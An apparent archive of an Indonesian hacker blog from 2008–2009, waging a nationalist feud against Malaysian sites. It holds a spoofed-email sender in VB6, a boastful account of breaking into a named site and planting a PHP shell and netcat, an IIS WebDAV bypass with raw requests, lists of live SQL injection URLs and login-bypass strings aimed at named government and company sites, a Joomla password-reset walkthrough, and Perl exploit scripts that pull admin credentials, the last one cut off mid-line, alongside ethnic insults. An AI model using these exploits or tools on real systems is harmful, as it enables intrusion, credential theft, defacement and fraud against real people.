Blogz nya YaDoY666

Fake Mailer With VB6

2009-08-20T01:14:00.005+07:00

Dear all reader,

Dah lama juga rasanya gw nggak update isi dari blog gw yang katrok ini, Setelah disibukan dengan beberapa kegiatan di dunia nyata, malem ini gw coba buat share sedikit tentang programming. Untuk kali ini gw akan coba membahas tentang pembuatan sebuah fake mailer dengan menggunakan visual basic. Yah langsung aja berhubung udah malem juga and besok gw juga musti masuk kerja. Fake mailer adalah sebuah program komputer yang berfungsi untuk mengirim fake email. Dalam pembuatan program ini gw menggunakan sebuah dll yaitu YaDoYMailSender.dll yang code nya gw dapet dari internet and udah gw modip dikit disesuaikan dengan kebutuhan.

Langsung aja, buat sebuah project baru tambahkan sebuah form dan add reference ke YaDoYMailSender.dll, setelah itu susun GUI nya seperti gambar berikut, atau sesuka hati kalian masing-masing

Lalu kopi paste kan code berikut

Dim WithEvents oMailer As YaDoYMailSender.clsSendMail

Private Sub Command1_Click()
On Error GoTo errHDL

If ValidateMe = True Then
tbStatus.Text = ""
With oMailer
.SMTPHostValidation = VALIDATE_HOST_NONE
.EmailAddressValidation = VALIDATE_SYNTAX
.SMTPHost = "fill with ur smtp host" 'SMTPHOST
.From = tbMailer(0)
.FromDisplayName = tbMailer(1)
.Recipient = tbMailer(2)
.RecipientDisplayName = tbMailer(3)
.ReplyToAddress = tbMailer(1)
.Subject = tbMailer(4)
.Message = tbMailer(5)
.Priority = HIGH_PRIORITY
.UseAuthentication = True
.Username = "fill with your smtp username" 'Username SMTP
.Password = "fill with your smtp password" 'Password SMTP
.MaxRecipients = 100
.ConnectTimeout = 20
.ConnectRetry = 5
.MessageTimeout = 60
.Send
sSMTPServer = .SMTPHost
End With
End If

Exit Sub
errHDL:
MsgBox Err.Description
End Sub

Private Sub Command2_Click()
Dim i As Integer

For i = 0 To 5
tbMailer(i).Text = ""
Next

tbStatus.Text = ""

End Sub

Private Sub Form_Load()
On Error GoTo errHDL
Set oMailer = New clsSendMail

Exit Sub
errHDL:
MsgBox Err.Description
End Sub

Private Function ValidateMe() As Boolean
On Error GoTo errHDL
Dim i As Integer

i = 0

For i = 1 To 5
If tbMailer(i).Text = "" Then
MsgBox "Invalid Value"
tbMailer(i).SetFocus
ValidateMe = False
End If

If InStr(Trim(tbMailer(0).Text), "@") = 0 Then
MsgBox "Invalid Value"
tbMailer(0).SetFocus
ValidateMe = False
End If
If InStr(Trim(tbMailer(2).Text), "@") = 0 Then
MsgBox "Invalid Value"
tbMailer(2).SetFocus
ValidateMe = False
End If
Next
ValidateMe = True
Exit Function
errHDL:
MsgBox Err.Description
ValidateMe = False
End Function

Private Sub oMailer_SendFailed(Explanation As String)
Dim sExplanation As String
sExplanation = tbStatus.Text & vbCrLf & sExplanation
tbStatus.Text = sMessage
End Sub

Private Sub oMailer_Status(Status As String)
Dim sMessage As String
sMessage = tbStatus.Text & vbCrLf & Status
tbStatus.Text = sMessage
End Sub

Setelah itu coba jalankan dengan menekan tombol F5 pada keyboard, isi sender dengan alamat fake email pengirim, sender display name dengan fake name pengirim, recipient dengan alamat email target, Recipient display name dengan nama target, subject dengan subject yang akan dikirim, dan message dengan isi pesan yang akan dikirim ke target, kemudian klik tombol send. Lihat pada textbox status pada bagian bawah untuk mengetahui status pengiriman email tersebut. Apabila pengiriman berhasil maka akan terdapat message sebagai berikut

Connecting to SMTP Server (mail.xxxxxxx.com)...
Initializing Communications...
Sending Login Authentication...
Host Login OK!
Sending Sender Information...
Sending Recipient Information...
Sending Message...
Transmission Complete...
Closing Connection...

Dll beserta source code dapat di download pada

http://www.indowebster.com/YaDoY666_Fake_Mailer.html

Enjoyy....!!!

Note*
Penulis tidak bertanggung jawab atas penyalahgunaan program ini, segala resiko akan penyalahgunaan program ini ditanggung oleh masing-masing pengguna.
*USE IT WITH YOUR OWN RISK*

Kami Tidak Takut....!!!!

2009-07-18T11:20:00.002+07:00

[BUKTI] 100% produk Indonesia, bukan MalingSIAL

2009-06-17T19:25:00.006+07:00

Saudara-saudari,

Kawan-kawan pejuang, ksatria dunia maya, pengelana tanpa nama, ntah siapa pun disana. Sebelumnya saya mengirimkan salam kepada kalian, semoga diberikan kesehatan dan umur panjang. (*mirip ama 2nd, hehehe).

Sebenarnya hal ini sudah lama kami perbincangkan, yaitu membuat kaos untuk SiD (*baca:Server Is Down), yang akhirnya dapat ter-realisasikan.

Akhir2 ini “tetangga” selalu mengkalim ini dan itu… padahal sudah 1 bukti yang tidak bisa disangkal oleh mereka. dan tentunya ini juga sebagai bukti kalau apa yang mereka claim adalah bukan hak mereka…
bukti itu adalah…

Dan ini adalah design logonya Semoga tidak mengecewakan.

Untuk bagian belakangnya hanya dibuat tulisan “http://www.serverisdown.org/”

Kaos ini kita persembahkan dengan harga :

S = Rp. 40.ooo,-
M = Rp. 40.ooo,-
L = Rp. 45.ooo,-
XL= Rp. 50.ooo,-

Ditambah ongkos kirim ke daerah masing-masing. Untuk pemesanan silahkan kirim email ke
order[at]serverisdown[dot]org dengan format :

Subject :
Pemesanan Kaos SiD

Content :
- Nama :
- Alamat Lengkap :
- No Telepon :
- Ukuran :

Untuk informasi lebih lanjut akan dikonfirmasikan melalui email, pengiriman kaos dilakukan setelah melakukan pembayaran.

Kaos SiD terbukti 100% Produk Indonesia bukan product MalingSIAL.
Hanya dijual di Indonesia, bukan di MalingSIAL.

Salam Hangat!
-SiD-

PS:
MalingSIAL tidak akan dilayani untuk pembelian kaos ini.

Maling is NATO...!!!

2009-05-23T22:14:00.007+07:00

Beberapa waktu yang lalu seseorang dengan IP 124.82.126.219 [MALAYSIA - WILAYAH PERSEKUTUAN - KUALA LUMPUR - 3.167 101.7 - TM ADSL SERVICE PROVIDER MALAYSIA - GIDNET.COM] posting di shout box gw, dengan lantang dia menulis "cuba hack situs ini. http://perkim.net.my/admin/login.cfm"

WTF, Kenal juga nggak enak bener main nyuru2 gw hack situs orang yg ga' ada urusan nya sama gw, karna ngerasa ga' kenal & ag' ada urusan sama tu site yaudah gw bodo amat, trus gw post "Sape lu, brani2an nyuru hack situs orang.. EEK lu ah.. dasar IDIOT" trus gw lanjutin deh kerjaan kantor gw yg lagi numpuk T_T. Beberapa jam kmudian gw cek lagi blog gw, and ternyata tu orang ngepost lagi di shoutbox gw "itu link gw..padahal lo gak bisa.... gw bagi, adminya bernama jizarul.....dapat hack lo hebat." Damn.. makin kesel aja gw sama tu orang, Tu orang ngaku klo dia adminya, Ga' lama kmudian trus gw cek tu link yg dikasi sambil dipenuhin rasa penasaran di ati gw ini, Seberapa hebat sih site yg dia bkin itu sampe-sampe sesumbar gitu nantang-nantangin orang suru attack sitenya.

Pas gw cek, ternyata tuh site make ColdFusion, OS Nya Windows 2000 dengan IIS 5 terinstall. Gw cek lebih jauh lagi ternyata bugsnya banyak bgt, mulai dari SQL Injection, Cross Site Scripting sampe IIS nya pun bermasalah. Karna masih bnyk kerjaan yah gw tinggalin aja deh tu web, males juga ngerjain tuh web yang katrok itu. hihihihi.. Dia fikir dia hebat kali gara-gara dia make ColdFusion.. Eeek dah..

Trus tadi siang ga' tau knapa tiba2 inget lagi tuh gw sama kesombongan itu admin yang sesumbar nantang-nantangin orang seenaknya, Mumpung libur sambil iseng gw mulai dah ngerjain tuh web.. Damn... Hanya dalam waktu 10 menit udah berhasil gw dapetin username + password itu web.. Sial ga' ada yang lebih susah apa.. wkwkwkwk... Coba login brosing sana-sini eh ternyata tu site bisa upload file... damn... Gw upload deh tuh php shell, and Wauw.. berhasil... hahahaha... brosing2 di dalem tu server coba2 upload netcat ternyata ga' bisa, trus test lagi gw tanti tuh netcat ekstensinya jadi *.txt dan ternyata berhasil... hahahaha... Goblok bener tu orang...

Parah gila lemot nya tu server, jalanin netcat waiting terus... errrkk... kagak sabar akhirnya gw sudahi aja smua ini dan gw akhri dengan ngedit beberapa file mreka.. hahahaha... cape deh...

Pak cik, pak cik...
Baru bisa bkin web katrok gt kok sesumbar, Pake ColdFusion ga' ngejamin web nya pak cik itu aman 100%... Dasar lu ah.. Terbukti lagi kan kalo maling2 itu cuma bisa sesumbar doank... Say Fuck lah buat maling2 sialan....

Nih gw kasih screenshoot nya...

Nih link nya : http://www.perkim.net.my/index.htm
Nih Mirror nya : http://www.evilc0der.com/mirror/27728/

YaDoY666 Greets : | Jack | Gblack | Don Tukulesto | n0c0py | De-Quest |

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass

2009-05-23T00:09:00.010+07:00

Discovered by Kingcope - May 12th, 2009

Affected Vendors : Microsoft
Affected Products : Web Server

Vulnerability Details
This vulnerability allows remote attackers to bypass access restrictions on vulnerable
installations of Internet Information Server 6.0. The specific flaw exists within the
WebDAV functionality of IIS 6.0. The Web Server fails to properly handle unicode tokens
when parsing the URI andsending back data. Exploitation of this issue can result in the
following:

[[*]] Authentication bypass of password protected folders

[[*]] Listing, downloading and uploading of files into a
  password protected WebDAV folder

Authentication bypass of password protected folders
Assume there is a password protected folder in "d:\inetpub\wwwroot\protected\".
The password protection mechanism is not relevant for the attack to work. Inside this folder
there is a file named „protected.zip“

The attacker sends a HTTP GET request to the web server.

GET / %c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername

As seen above the URI contains the unicode character '/' (%c0%af). This unicode character is
removed in a WebDAV request. „Translate: f“ instructs the web server to handle the request
using WebDAV. Using this malicious URI construct the webserver sends the file located at
„/protected/protected.zip“ back to the attacker without asking for proper authentication.
Another valid request an attacker might send to the web server is:

GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername

IIS 6.0 will remove the „%c0%af“ unicode character internally from the request and send back
the password protected file without asking for proper credentials. ASP scripts cannot be
downloaded in this way unless serving of script source-code is enabled.

Listing files in a password protected WebDAV folder
The attack on WebDAV folders is similar. The attacker can bypass the access restrictions of the
password protected folder and list, download, upload and modify files. The attacker sends a
PROPFIND request to the web server.

PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml

IIS responds with the directory listing of the folder without asking for a password.

Credit

This vulnerability was discovered by:
Nikolaos Rangos
Contact: kcope2@googlemail.com
Greetings to: alex and andi

# milw0rm.com [2009-05-15]

Another Stupid Maling Action

2009-04-15T12:53:00.003+07:00

Hahahaha...

My friends X-Shadow tell me that some maling try to attack his site, but do you know maling attack with stupid action. X-Shadow site use Wordpress, but maling attack with Old Joomla bugs..

wkakakakakakak... This is fact that Malingsial Is Very IDIOT... wkakakakakak

let's check this out

Hahahaha... Very stupid right... lol

Alien Idiot Crew Ternyata NATO

2009-04-14T17:12:00.003+07:00

Dear all reader,

Tadi sore seorang malingsial h4x0r mencoba mengirim email ke gw, berikut isi nya

dari	UpXiLon
ke		yadoy666@gmail.com
tanggal		14 April 2009 17:07
subjek		assalamualaikum
dikirim oleh		hmsecurity.org

assalamualaikum yadoy666.

aku UpXiLon , member dari hmsecurity. aku nak inform yang user Alien Crew ada post dekat your shoutbox. and dia ade bagi few links of my defaced webs. please ignore semua link tu. aku tak pernah provoke untuk gaduh Malaysia Indonesia.

and kalau boleh, please bagi aku full IP utk nick Alien Crew tu. aku nak check sape user tu.

thanx.

Dari email tersebut jelas lah sudah bahwa si Alien_Idiot_Crew hanyalah si Mulut besar yang coba mengadu domba kita, So buat temen yang lain tolong jangan terpancing dengan kelakuan si Alien _Idiot ini... Tahan dulu rasa geram kita kawan..

Make Your Own IPLocator Using VB6

2009-03-25T02:49:00.004+07:00

Dear all reader..

In this time i would like to show you how to get location from some IP Address. I using Visual Basic 6.0 to make this program.

How it's work
Just simple trick, I just get some data from http://www.ip2location.com. lol :P

Ok, Lets start it.

We need MSINET.OCX component to make this program.

Place this component in your from and make UI like this

And copy paste this code.

Private Sub btnBlack_Click()
On Error Resume Next

Dim source As String
SetUI
Inet1.Cancel
ucFirefoxWait.Visible = True
Timer1.Enabled = True

If txtIP.Text = "" Then
MsgBox "IP Not valid"
Exit Sub
Else
ucFirefoxWait.PlayWait
source = Inet1.OpenURL("http://www.ip2location.com/" & txtIP.Text)
lblCountry.Caption = Mid(Split(Split(source, "dgLookup__ctl2_lblICountry")(1), "")(0), 3)
lblRegion.Caption = Mid(Split(Split(source, "dgLookup__ctl2_lblIRegion")(1), "")(0), 3)
lblCity.Caption = Mid(Split(Split(source, "dgLookup__ctl2_lblICity")(1), "")(0), 3)
lblISP.Caption = Mid(Split(Split(source, "dgLookup__ctl2_lblIISP")(1), "")(0), 3)
End If

End Sub

Private Sub Form_Load()

SetUI

End Sub

Private Sub SetUI()

lblCountry.Caption = ""
lblRegion.Caption = ""
lblCity.Caption = ""
lblISP.Caption = ""
Timer1.Enabled = False
ucFirefoxWait.Visible = False
End Sub

Private Sub Timer1_Timer()

If lblCountry.Caption <> "" Or lblRegion.Caption <> "" Or lblCity.Caption <> "" Or lblRegion.Caption <> "" Or lblISP.Caption <> "" Then
ucFirefoxWait.StopWait
ucFirefoxWait.Visible = False
Timer1.Enabled = False
End If

End Sub

Try to run it....

So cool right... lol

You can download the executeable file of this program @ http://geocities.com/yadoy666/download/IPLocation.zip

SQL Injection @ Malingsial CMS paranoid dork

2008-12-31T02:12:00.007+07:00

SQL Injection Vulnerability & multiple SQL Injection Vulnerability Malingsial CMS with Paranoid Dork

[+] Bug : SQL injection
[+] Vendor : Random Paranoid
[+] Author : Xshadow
[+] Contact : admin[a]cukdus[dot]org
[+] Visit : http://xshadow-power[dot]com
[+] Greetz : inc0mp13te, IndoUnderground, Jack-, selalu_ngantuk, cyber_tomat, black_sonic, k0il, all member x-code
[+] Main Support: Indonesia
[+] Support Person: yadoy666 (http://yadoy666.serverisdown.org/)
[+] Sponsors: http://malingsial.serverisdown.org/

Paranoid Dork: inurl:".php?id=" site:.my

[o]Sql Injection part 1
[=]original vendor: unknown malingsial CMS
[=]vuln file : corporate.php
[=]target : http://www.halal.gov.my/corporate.php?ID=116+AND+1=2+UNION+SELECT+0,version(),2,3,4,5,6,7,8

[o]Sql Injection part 2
[=]original vendor: Multimedia Development Corporation
[=]vuln file : event_detail.php
[=]target :http://cmc.msc.com.my/event_detail.php?ID=239+AND+1=2+UNION+SELECT+0,1,version(),version(),
version(),5,6,7,8,9,10,11,12,13,14--

[o]Sql Injection part 3
[=]original vendor: unknown malingsial CMS
[=]vuln file : readnews.php
[=]target :http://www.mynic.net.my/readnews.php?id=78+AND+1=2+UNION+SELECT+0,version(),2,3,version(),5,6,7,8,
9,10,11,12--

[o]Sql Injection part 4
[=]original vendor: unknown malingsial CMS
[=]vuln file : tips.php
[=]target : http://www.fomca.org.my/english/tips.php?id=21+AND+1=2+UNION+SELECT+0,version(),version(),3,4,5,6,7,8--

[o]Sql Injection part 5
[=]original vendor: unknown malingsial CMS
[=]vuln file : full_metadata_xml.php
[=]target: http://www.infodesa.gov.my/infodesa/applications/datasource/full_metadata_xml.php?id=191+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,version(),
10,version(),version(),version(),version(),version(),version(),version(),18,19,20,21,
22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,
50,51--

[o]Sql Injection part 6
[=]original vendor: unknown malingsial CMS
[=]vuln file : about_pressRelease_det.php
[=] target : http://www.nazakia.com.my/about_pressRelease_det.php?id=43+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,
version(),version(),13,14,15,16,17,18,19--

[o]Sql Injection part 7
[=]original vendor: unknown malingsial CMS
[=]vuln file : aduan_siar_c.php
[=] target : http://www.halaljakim.gov.my/aduan_siar_c.php?id=1931+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,version(),9,
10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28--

[o]Sql Injection part 8
[=]original vendor: unknown malingsial CMS
[=]vuln file : faq.php
[=] target : http://www.mynic.net.my/faq.php?id=29+AND+1=2+UNION+SELECT+0,version(),2,3--

[o]Sql Injection part 9
[=]original vendor: unknown malingsial CMS
[=]vuln file : item.php
[=] target : http://www.reliancemetal.com.my/catalog/item.php?id=124+AND+1=2+UNION+SELECT+0,1,2,3,4,5,version(),7,8,9,
10,11,12,13,14--

[o]Sql Injection part 10
[=]original vendor: unknown malingsial CMS
[=]vuln file : pressroom_pressrelease_release.php
[=] target : http://www.misc.com.my/pressroom_pressrelease_release.php?id=35+AND+1=2+UNION+SELECT+0,1,
version(),version(),version(),5,6,7,version(),9,10--

[o]Sql Injection part 11
[=]original vendor: unknown malingsial CMS
[=]vuln file : item.php
[=] target : http://www.automotivefilter.com.my/catalog/item.php?id=1610+AND+1=2+UNION+SELECT+0,1,2,3,4,5,version(),7,8,
9,10,11,12,13,14--

Remote File Discolousure Vulnerability @ Malingsial CMS

2008-12-18T23:44:00.005+07:00

===========================================
Bug : Remote File Discolousure Vulnerability
Vendor : unknown
Author : Xshadow
Contact : admin[a]cukdus[dot]org
Visit: : http://xshadow-power[dot]com
===========================================
[o]Vulnerable file
download.php
$filename=$_GET["filename"];
$fullpath="dokumen/".$filename;
session_cache_limiter("public, post-check=50");
header("Cache-Control: private");
header("Content-Type: application/zip");
header("Content-Length: ".filesize($fullpath));
header("Content-Disposition: attachment; filename=$filename");
readfile($fullpath);

dork: download.php?filename= site:my

Sample: http://chemical.eng.um.edu.my/download.php?filename=../mainfile.php

STUPID SQL INJECTION @ STUPID MALINGSIAL CMS

2008-11-19T01:32:00.003+07:00

Kembali ditemukan kebodohan pada malingsial CMS....

Kebodohan yang teramat sangat bodoh untuk sebuah CMS yang berbayar...

JANGAN MAU MEMAKAI PRODUK-PRODUK MALINGSIAL...!!!

KARENA MALINGSIAL BENAR-BENAR BODOH, BAHKAN UNTUK INJEKSI SEMACAM INI PUN MALINGSIAL TIDAK MAMPU MENANGANINYA...

LANGSUNG SAJA SAYA BERIKAN INFORMASINYA

===========================================================
Nama CMS : WEB-CMS - V-WIN.COM CMS [MALINGSIAL STUPID CMS]
Vendor : V-WIN.COM [MALINGSIAL GITU LOCH]
Author : http://serverisdown.org
Dork : "Concept, Designed, and Maintained by www.v-win.com"
===========================================================

EXPLOIT :

JUST USING STUPID INJECTION IN LOGIN PAGES

USERNAME : admin ' or ' 1=1
PASSWORD : ' or ' 1=1

BENAR-BENAR BODOH...!!!!!!

ADMIN PAGES DAPAT DITEMUKAN PADA

http://site.com/path/admin

Live Demo :

http://www.peps.org.my/admin/
http://www.graduanbersatu.com/admin
http://www.cocoa.com.my/admin/
http://www.kasturi.edu.my/admin/

Enjoy..!!!!

===========================================================
Greets
Jack, kecemplungkalen, tukulesto, h4ckerku, serverisdown,
Tr1993r_m4ch1n3, bL4ck_3n91n3, Ninj4_bLu3, D30B4, giLLa,
#noscan crew, EminEm, Coco_nk4l, yOrz, Vrs-hCk, M364TR0N,
CYB3R_TR0N, putrislankers team, SasaIndaHoz,
surabayahackerlink, mainhack brotherhood, anggrek hackers™

MALINGSIAL SERVER IS DOWN
http://malingsial.serverisdown.org

WEB-CMS - V-WIN.COM CMS [MALINGSIAL STUPID CMS]

2008-11-17T23:32:00.005+07:00

========================================================
[o] WEB-CMS - V-WIN.COM CMS SQL Injection Vulnerability
Software : WEB-CMS - V-WIN.COM CMS [MALAYSIA WEBSITE CONTENT MANAGEMENT SYSTEM]
Vendor : http://www.v-win.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
========================================================
[o] Exploit
http://localhost/[path]/?page=pri&pid=[SQL Query]
[o] Live Demo
http://www.v-win.com/cms/?page=pri&pid=[FUCK YOU MALINGSIAL!]
http://www.v-win.com/cms/

[o] Dork
"Concept, Designed, and Maintained by www.v-win.com"
========================================================
[o] Greetz
MainHack BrotherHood [ http://serverisdown.org/blog/]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
H312Y yooogy mousekill }^-^{ kaka11 martfella
skulmatic olibekas ulga Cungkee k1tk4t str0ke
GANYANG MALINGSIAL!!! [ http://serverisdown.org/malingsial/ ]
========================================================

Sebenernya masih banyak bangget bugs di CMS tolol ini, tapi kesenengan para malingshit kalo itu bugs gw post disini.. Bugs, nya parah bangget lagi...

Eh Maling... Please dunk jangan ngotor2in blog gw.. Mending sono lu pada belajar koding yang bener, bikin mailer aja masih minta tolong ama anak2 YF.. Eh ngaku2 nya 3ll1t3 h4x0r lagi... errrkk.. taeekk lu..

Buat temen2 yang lain yang pengen bantai maling lewat CMS tolol ini, silahkan PM gw aja.. ntar gw kasi bugs tolol mereka & eksploitnya skalian....

DorkTools Version 3.1

2008-11-01T20:01:00.011+07:00

---------------------------------------------------------------
Copyright (C) YaDoY SoFtWaRe DeVeLoPmenT, 2008

Engine Version : 3.1
Release : 01 November 2008
Last Update : 01 November 2008
License : Freeware
----------------------------------------------------------------

DorkTools Version 3.1 is a simple program to search anything in internet using google query. Bulid with Ms. Visual Basic 6.0. This program is very cool to search anything in google without open Google site.

Whats New
[=] Result more cool
[=] No need MSINET.OCX
[=] No need Mscomctl.OCX
[=] List result more wide than before

This program is free of charge, everyone can download it but for malingsial people please not downlod this program. Please use your brain to make your own DorkTools. This program need comdlg32.ocx to run. I have include comdlg32.ocx int this packet. So you just registering comdlg32.ocx. Download DorkTools Version 3.1 at

http://geocities.com/yadoy666/download/dorktoolsv.3.1.zip

Enjoyy..!!

Support our indonesian h4x0r to fuckin Malingsial server

Status Checker

2008-11-01T19:43:00.005+07:00

Status Checker Version 1.1
---------------------------------------------------------------
Copyright (C) YaDoY SoFtWaRe DeVeLoPmenT, 2008

Engine Version : 1.1
Release : 01 November 2008
Last Update : 01 November 2008
License : Freeware
----------------------------------------------------------------

A simple program to detect Yahoo Messenger status. Build with Ms Visual Basic 6.0. This program need MSINET.OCX to run. I have include MSINET.OCX in this packet. You doesnt need install this program to your PC but you just registering MSINET.OCX. Donwload This program in http://geocities.com/yadoy666/download/StatusChecker.zip This program if free of charge and everyone can download it. But for malingsial people please not downlod this program, please use your brain to make your own Status Checker...!!!

Hellcome To http://malingsial.serverisdown.org/

2008-10-11T14:27:00.007+07:00

HELLCOME TO MALINGSIAL SERVERISDOWN

http://malingsial.serverisdown.org/

The 1st Collection of MalingSial Server who get 0wn3d

thanx's to :

Jack
bL4ck_3n91n3
Tr1993r_m4ch1n3
BLACK
N1nj4_bLu3

YogyaFree, MainhackBrotherhood™, And all Indonesian Defacer Team

You May SUbmit Your "0wn3d" to

Submit [ at ] serverisdown [ dot ] org

Joomla 1.5.x Remote Admin Password Change

2008-08-24T01:36:00.008+07:00

Baru-baru ini telah ditemukan sebuah celah keamanan pada Joomla CMS yang memungkinkan sang
attacker merest password administrator.Celah tersebut ditemukan
oleh seorang hacker Polandia dengan nick name d3m0n (d3m0n@o2.pl).

Hacker tersebut menemukan kelemahan pada file controller.php dan reset.php

################################################################################
Line : 379-399

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); {1}
      
// Get the model
$model = &$this->getModel('Reset');

// Verify the token
if ($model->confirmReset($token) === false)  {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
return false;
}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}

################################################################################

File : /components/com_user/models/reset.php

Line: 111-130



function confirmReset($token)
{
global $mainframe;

$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation =
   '.$db->Quote($token));  {3}

// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);

return true;
}
################################################################################

Masukan karakter petik tunggal [ ' ] pada tanda {1}
Jika kita tekan enter maka query yg dihasilkan adalah :

"SELECT id FROM jos_users WHERE block = 0 AND activation = '' " tanda {3}

Contoh penggunaan kelemahan tersebut sebagai berikut:

1. target.com/index.php?option=com_user&view=reset&layout=confirm
2. Masukan karakter petik tunggal [ ' ] pada field token kemudian enter
3. Masukan password admin yang baru
4. Kemudian login di login page nya => target.com/administrator
5. Login dengan menggunakan password yang telah kita masukan sebelumnya

Kekurangan dari kelemahan ini adalah kita harus tau userID sang
administrator tersebut.Namun hal itu tidak masalah karenakita dapat
menemukan userID pada setiap artikel yang ditulis di site tersebut




Sumber: milw0rm.com

eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploit

2008-08-01T09:15:00.008+07:00

#!/usr/bin/perl
#=====================================================
#[x] eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploit
#[x] Vendor : http://www.endonesia.org/
#[x] Bug : mod.php?mod=iklanbaris&op=viewlink&cid
#[x] Bugs Found at : 01-08-2008
#[x] Bugs Found By : YaDoY666
#[x] Author Blogs : http://yadoy666.blogspot.com/
#[x] Greets : Jack, n0c0py, odod, Jery Maheswara, x-sari, m4rtincornelis
#=====================================================
use HTTP::Request;
use LWP::UserAgent;

$sql_vulnerable = "/mod.php?mod=iklanbaris&op=viewlink&cid=";
$sql_injection ="-1/**/union+select/**/000,concat(aid,0x3a,pwd),666/**/from+authors/*where admin 1";

if(!@ARGV) { &help;exit(1);}
sub help(){
print "\n [x] eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploit\n";
print " [x]===============================================\n";
print " [x] Use : perl $0 http://www.target.com/n";
print " [x] Dont use \"http:///";
print " [x] Exploit By : YaDoY666 http://yadoy666.blogspot.com/ \n";
print " [x]===============================================\n";
print " [x] YogyaFree - MainHack BrotherHood - Echo - Jasakom \n\n";
print " [x] http://www.yadoy666.blogspot.com/n/n";
}

while (){
my $target = $ARGV[0];
my $exploit = "http:///;
print "\n [-] Trying to inject $target ...\n\n";
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success){
my $res = $response->content;
if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
my ($username,$passwd) = ($1,$2);
print " [target] $target \n";
print " [loginx] $username:$passwd \n\n";
exit(0);
}
else {
die " [error] Fail to get username and password.\n\n";
}
}
else {
die " [error] Fail to inject $target \n\n";
}
}

DorkTools V.2.0

2008-06-15T13:13:00.007+07:00

Dork Tools Version 2.0
---------------------------------------------------------------
Copyright (C) YaDoY SoFtWaRe DeVeLoPmenT, 2008

Engine Version : 2.0
Release : 15 Juni 2008
Last Update : 15 Juni 2008
License : Freeware
----------------------------------------------------------------

DorkTools V.2.0 merupakan pengembangan dari versi sebelumnya yang pernah saya bahas pada http://yadoy666.blogspot.com/2008/06/dorktools-v100.html Pada versi yang kedua ini ditambahkan berbagai kemampuan untuk melakukan mengambil search result dari google jadi anda dapat memilih site yg akan dibuka pada browser tanpa menggunakan google seperti pada versi sebelumnya. Selain itu DorkTools V.2.0 juga dilengkapi dengan kemampuan untuk menyimpan hasil pencarian kedalam sebuah text file.

DorkTools v.2.0 membutuhkan beberapa komponen antara lain

MSINET.OCX
MSCOMCTL.OCX
comdlg32.ocx

DorkTools V.2.0 berlisensi Freeware anda dapat mendistribusikan nya kembali selama untuk kegiatan non profit. DorkTools V.2.0 dapat anda download pada
http://geocities.com/yadoy666/download/dorktoolsv2.zip

i-Rater Platinum version [2004] Remote SQL inJection Exploit

2008-06-14T14:34:00.008+07:00

#usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;
use URI::Escape;
#------------------------------------------------------------------------------
# [x] i-Rater Platinum version [2004] Remote SQL inJection Exploit
# [x] Ditemukan Oleh________: n0c0py - a.k.a 5iR. 4b03D @rms7R0n9z
# [x] Pada Tanggal__________: 7 juni 2008
# [x] Laporkan pada vendor__: Belum
# [x] Dork__________________: Powered by I-RATER PLATINUM copyright 2004
# [x] Deskripsi_____________: Welcome to I-RATER, Home of the most advanced PHP
#                             image rating hotornot script packages available.
#                             Unlike other developers, we create and manage our
#                             php picture rating scripts exclusively. We do not
#                             any other software and we are specialists in our
#                             field.Our suite of photo rating scripts and extras
#                             have something to cater for every webmasters need.
#-----------------------------------------------------------------------------
#
# ============================================================================
#[POC]
# http://victim.com/show_image.php?id=15280&p=-99/**/union/**/select/**/
#       0x76756C6E657261626C65/*
# [Catatan]
# beberapa kasus mengharuskan mendaftar sebelum melakukan eksploitasi,
#  silahkan buat akun terlebih dahulu
# n0c0py tidak bertanggung jawab atas penyalahgunaan exploit ini
# greetz : yadoy666, Xshadow, Jack, odod, ray16, indounderground,
# k0il, k1tk4t, opt1|c, shadow angel
# masyarakat hacking indonesia : yogyafree.net - newhack.org - mainhack.com
# - echo.or.id - k-elektronik.net
# Hacker Indonesia Cintailah bahasa Indonesia
# ===========================================================================

if (@ARGV <>";
print"\n[!] Contoh     : perl $0   myuser mypassword 127.0.0.1 /i-rater";
print"\n[!] Pilihan    :";
print"\n                -p [ip:port]  Proxy support";
print"\n";
exit;
}

print "[+] melakukan eksploitasi...\n";

eksploitasi();

print "\n[+] Bravo!! :D";
print "\n[+] Eksploitasi Selesai BOss!! :D\n";

sub eksploitasi

{
my $user = $ARGV[0];
my $pass = $ARGV[1];
my $host     = $ARGV[2];
my $path     = $ARGV[3];
my $loggedin = "Y";
my $submit = uri_escape(" login -> ");
my %options = ();
GetOptions(\%options, "p=s");
my $url1 = "http://".$host.$path."/login.php";
my $url2 = "http://".$host.$path."/show_image.php";
my $sploit = "?id=15280&p=-99/**/union/**/select/**/concat(0x3a3a3a,id,0x3a3a,
